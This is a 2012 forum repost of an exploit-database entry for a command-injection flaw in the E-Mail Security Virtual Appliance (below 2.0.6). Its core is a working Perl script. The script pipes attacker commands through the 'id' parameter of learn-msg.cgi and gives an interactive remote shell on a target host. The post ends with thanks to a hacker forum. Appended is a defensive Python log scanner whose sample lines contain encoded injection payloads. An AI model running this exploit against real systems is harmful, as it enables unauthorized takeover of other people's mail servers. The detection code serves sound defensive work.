DarkyAngel
Posted August 18, 2012

[table=width: 500, class: grid]
[tr][td]EDB-ID: 20551[/td][td]CVE: N/A[/td][td]OSVDB-ID: N/A[/td][/tr]
[tr][td]Author: iJoo[/td][td]Published: 2012-08-16[/td][td]Verified: [/td][/tr]
[tr][td]Exploit Code: [/td][td]Vulnerable App: N/A[/td][td][/td][/tr]
[/table]

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
# Date: 10 Aug 2012
# Exploit Author: iJoo
# Vendor Homepage: http://www.esvacommunity.com/
# Software Link: http://sourceforge.net/projects/esva-project/
# Version: < 2.0.6

ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.

-=+ Infected Files
..../cgi-bin/learn-msg.cgi
..../cgi-bin/release-msg.cgi

No stripping/filtering of metacharacters was found.
An attacker can easily execute commands.

-=+ Simple RCE ESVA

#! /usr/bin/perl
use LWP;
use HTTP::Request;

if (@ARGV < 1)
{
    print "\n==========================================\n";
    print " ESVA - REMOTE EXECUTION SCRIPT \n";
    print "==========================================\n";
    print "Usage: perl esva.pl host (without http://)\n";
    print "Ex. perl esva.pl www.korban.com\n";
    exit;
}

$host=$ARGV[0];
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);

while($cmd !~ "exit")
{
    $content = "";
    $ua = LWP::UserAgent->new();
    $ua->agent('');
    # The id parameter is sent as |<cmd>; (%7c is "|", %3b is ";")
    $request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
    $response = $ua->request ($request);
    $content = $response->content;
    print $content."\n";
    print "iDSc-shell# ";
    chomp( $cmd = <STDIN>);
}

-=+ Thanks to
My lovely Country NKRI INDONESIA!!
binh4x staff - www.binushacker.net // Forum.binushacker.net
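A defender-side check for the request pattern in the post above, as an added example that is not part of the original post or of the ESVA project: it scans web access-log lines for requests to the two CGI scripts named in the advisory whose id parameter falls outside an allowlist, including percent-encoded and double-encoded metacharacters. The log lines are constructed, and the allowlist for a legitimate id (letters, digits, '.', '-', '_') is an assumption to adjust to the ids your appliance actually issues.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The two CGI scripts named in the advisory.
AFFECTED_PATHS = {"/cgi-bin/learn-msg.cgi", "/cgi-bin/release-msg.cgi"}
# Assumption: a legitimate message id is only letters, digits, '.', '-' and '_'.
SAFE_ID = re.compile(r"[A-Za-z0-9._-]{1,64}")
# Request line inside a combined-format access-log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2012:10:00:01 +0000] "GET /cgi-bin/learn-msg.cgi?id=%7cid%3b HTTP/1.1" 200 57 "-" "-"',
    '192.0.2.11 - - [16/Aug/2012:10:00:05 +0000] "GET /cgi-bin/release-msg.cgi?id=%257cuname%253b HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.12 - - [16/Aug/2012:10:01:00 +0000] "GET /cgi-bin/learn-msg.cgi?id=4F2A91C03E.A7B21 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [16/Aug/2012:10:02:00 +0000] "GET /index.html?id=%7cid%3b HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %257c -> %7c -> |)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_id(log_line):
    """Return the decoded id if the request targets an affected CGI script
    with an id outside the allowlist, otherwise None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if unquote(url.path) not in AFFECTED_PATHS:
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "id" and not SAFE_ID.fullmatch(fully_decode(value)):
            return fully_decode(value)
    return None


def scan(lines):
    """Return (line_number, decoded_id) for every flagged line."""
    hits = [(n, suspicious_id(line)) for n, line in enumerate(lines, 1)]
    return [(n, v) for n, v in hits if v is not None]
```

The same allowlist, applied inside the CGI scripts before the id reaches any shell command, is the input validation the advisory reports as missing.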